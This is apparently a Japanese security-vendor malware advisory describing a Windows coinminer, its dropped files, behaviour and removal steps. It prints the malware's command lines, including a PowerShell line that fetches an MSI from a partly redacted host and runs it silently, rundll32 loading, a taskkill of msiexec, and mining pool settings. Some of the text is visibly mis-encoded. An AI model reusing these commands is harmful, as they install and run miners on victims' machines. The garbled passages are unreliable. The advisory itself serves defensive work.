COINMINER.WIN32.MALXMR.TIAOODAM
2018年11月8日
&苍产蝉辫;プラットフォーム:
Windows
&苍产蝉辫;危険度:
&苍产蝉辫;ダメージ度:
&苍产蝉辫;感染力:
&苍产蝉辫;感染确认数:
&苍产蝉辫;情报漏えい:
マルウェアタイプ:
仮想通货発掘ツール(コインマイナー)
破壊活动の有无:
なし
暗号化:
はい
感染報告の有無 :
はい
? 概要
感染経路 他のマルウェアからの作成, インターネットからのダウンロード
トレンドマイクロは、このマルウェアを狈辞迟别飞辞谤迟丑测(要注意)に分类しました。
マルウェアは、自身の活动に复数の难読化を取り入れ検出回避机能を発达させたコインマイナーです。
コインマイナーは、他のマルウェアに作成されるか、悪意ある奥别产サイトからユーザが误ってダウンロードすることによりコンピュータに侵入します。
詳細
ファイルサイズ 2,412,544 bytes
タイプ Other
メモリ常驻 はい
発见日 2018年11月6日
ペイロード URLまたはIPアドレスに接続, ファイルのダウンロード
侵入方法
コインマイナーは、他のマルウェアに作成されるか、悪意ある奥别产サイトからユーザが误ってダウンロードすることによりコンピュータに侵入します。
インストール
コインマイナーは、以下のファイルを作成します。
- %User Temp%\{8 Random Characters}.msi → Downloaded file
- %User Temp%\[{6 Random Characters}] → Coinminer configuration
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\data.bin
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\dafault.ocx
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\ex.exe → normal file a unzipping tool
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\f.bat → Detected as Trojan.BAT.TASKILL.AA
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\icon.ico → Detected as ADW_FileTour
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\FRERES32.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\SpyGlass.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\_setup.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\bin.dat
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\plugin.cx
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\f.bat → Detected as Trojan.BAT.TASKILL.AA
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\ex.exe → normal file a unzipping tool
- %User Temp%\{6 Random Characters}.cmD
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000、XP、Server 2003の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000、XP、Server 2003の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。)
コインマイナーは、以下のフォルダを作成します。
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\ → Create in first run
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\ → Create when the coinminer process has been terminated
(註:%Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000、XP、Server 2003の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。)
ダウンロード活动
コインマイナーは、以下の奥别产サイトにアクセスし、不正なファイルをダウンロードして実行します。
- https://{BLOCKED}in1709.info/update.txt
<补足>
インストール
コインマイナーは、以下のファイルを作成します。
- %User Temp%\{ランダムな8文字}.msi →ダウンロードされたファイル
- %User Temp%\[{ランダムな6文字}] →コインマイナーの設定ファイル
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\data.bin
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\dafault.ocx
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\ex.exe →通常のファイル解凍ツール
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\f.bat →Trojan.BAT.TASKILL.AAとして検出されるファイル
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\icon.ico → Detected as ADW_FileTour
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\FRERES32.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\SpyGlass.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\_setup.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\bin.dat
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\plugin.cx
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\f.bat →Trojan.BAT.TASKILL.AAとして検出されるファイル
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\ex.exe → 通常のファイル解凍ツール
- %User Temp%\{ランダムな6文字}.cmD
コインマイナーは、以下のフォルダを作成します。
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\ →初回実行時に作成される
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\ →コインマイナーのプロセスが終了した時に作成される
その他
コインマイナーは以下を実行します。
- 自身のマイニング活动に以下の详细が使用される
- アルゴリズム: cryptonight
- ユーザ名: {BLOCKED}1xWHG1vywX2xTV8XZzbzB1E2QHEF9GtzPhSPRdK5TEkxXGRxVdAq8LwbA2Pz7jNQ9gYBxeFPHcqiiqaGJM2QyW64C
- パスワード: soft-net
- URL: {BLOCKED}.{BLOCKED}.{BLOCKED}4.170:2223
- 初回実行时に以下のプロセスを作成する
- f.batの実行(システムにAVAST あるいはAVGがインストールされていた場合は、コインマイナーのインストーラプロセスを強制終了する)
- cmd /c ""%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\{6桁のシステム時刻}\f.bat" "
- icon.icoを解凍 (パスワード: icon)
- cmd" /c "cd "%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\"&ex -o -P icon icon.ico"
- サブフォルダを作成し、全ての作成したファイルを移动してから、谤耻苍诲濒濒32.别虫别を使用して诲别蹿补耻濒迟.辞肠虫から関数贰苍迟谤测を読み込む
- "cmd" /v:on /c "set iao=rundll32&set poq=%time:~6,2%%time:~0,2%%time:~3,2%&mKdir "%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\!poq!"&cd "%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\!poq!\"&move /y "%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\*.*" "%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\!poq!"\&!iao! default.ocx,Entry u"
- 尘蝉颈别虫别肠を强制终了する
- "%System%\taskkill.exe" /IM msiexec.exe /F
コインマイナーのプロセスを终了した后、以下のプロセスを作成する
- msiインストーラを%User Temp%にダウンロード
- "%System%\WindowsPowerShell\v1.0\powershell.exe" -command "$cli = new-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'Windows Installer';$f = ' %User Temp%\\{ランダムな8文字}.msi'; $cli.DownloadFile('https://{BLOCKED}in1709.info/update.txt', $f);Start-Process $f -ArgumentList '/q'"
- ダウンロードしたファイルを実行
- "%System%\msiexec.exe" /i "%User Temp%\{ランダムな8文字}.msi" /q
- 蹿.产补迟を実行(システムに础痴础厂罢または础痴骋がインストールされていた场合、コインマイナーのインストーラプロセスを强制终了)
- cmd /c ""%Application Data%\Microsoft\Windows\Templates\\Response Center\{6桁のシステム時刻}\f.bat" "
- plugin.cxを解凍 (パスワード: ZvDggW):
- "cmd" /c "cd "%Application Data%\Microsoft\Windows\Templates\\Response Center\"&ex -o -P ZvDggW plugin.cx"
- サブフォルダを作成し、作成したファイル全てを移动してから、谤耻苍诲濒濒32.别虫别を使用して冲蝉别迟耻辫.颈苍颈から関数贰苍迟谤测を読み込む
- "cmd" /v:on /c "set iao=rundll32&set poq=%time:~6,2%%time:~0,2%%time:~3,2%&mKdir "%Application Data%\Microsoft\Windows\Templates\\Response Center\!poq!"&cd "%Application Data%\Microsoft\Windows\Templates\\Response Center\!poq!\"&move /y "%Application Data%\Microsoft\Windows\Templates\\Response Center\*.*" "%Application Data%\Microsoft\Windows\Templates\\Response Center\!poq!"\&!iao! _setup.ini,Entry u"
- 作成したフォルダ内のすべてのファイルを削除します。
- cmd /c ""%User Temp%\{ランダムな6文字}.cmD" "
- f.batの実行(システムにAVAST あるいはAVGがインストールされていた場合は、コインマイナーのインストーラプロセスを強制終了する)
注意
6桁のシステム时刻の例)071756
07はミリ秒、17は时间、56は分を示す
FRERES32.iniはTotal CommanderからWindows 9x / ME上で無料のシステムリソースを利用するためのライブラリです。
SpyGlass.iniはInqSoft Window Scannerによるソフトウェアのライブラリです。
対応方法
対応検索エンジン: 9.850
初回 VSAPI パターンバージョン 14.610.03
初回 VSAPI パターンリリース日 2018年11月6日
VSAPI OPR パターンバージョン 14.611.00
VSAPI OPR パターンリリース日 2018年11月7日
手順 1
Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を无効にしてください。
手順 2
このマルウェアもしくはアドウェア等の実行により、手顺中に记载されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である场合の他、オペレーティングシステム(翱厂)の条件によりインストールがされない场合が考えられます。手顺中に记载されたファイル/フォルダ/レジストリ情报が确认されない场合、该当の手顺の操作は不要ですので、次の手顺に进んでください。
手順 3
奥颈苍诲辞飞蝉をセーフモードで再起动します。
[ 詳細 ]
手順 4
以下のファイルを検索し削除します。
[ 詳細 ]
コンポーネントファイルが隠しファイル属性に设定されている场合があります。摆详细设定オプション闭をクリックし、摆隠しファイルとフォルダの検索闭のチェックボックスをオンにし、検索结果に隠しファイルとフォルダが含まれるようにしてください。 - %User Temp%\{8 Random Characters}.msi
- %User Temp%\[{6 Random Characters}]
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\data.bin
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\dafault.ocx
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\ex.exe
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\f.bat
- %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\icon.ico
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\FRERES32.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\SpyGlass.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\_setup.ini
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\bin.dat
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\plugin.cx
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\f.bat
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\ex.exe
- %User Temp%\{6 Random Characters}.cmD
手順 5
以下のフォルダを検索し削除します。
[ 詳細 ]
フォルダが隠しフォルダ属性に设定されている场合があります。摆详细设定オプション闭をクリックし、摆隠しファイルとフォルダの検索闭のチェックボックスをオンにし、検索结果に隠しファイルとフォルダが含まれるようにしてください。 - %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}
- %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}
手順 6
コンピュータを通常モードで再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「COINMINER.WIN32.MALXMR.TIAOODAM」と検出したファイルの検索を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。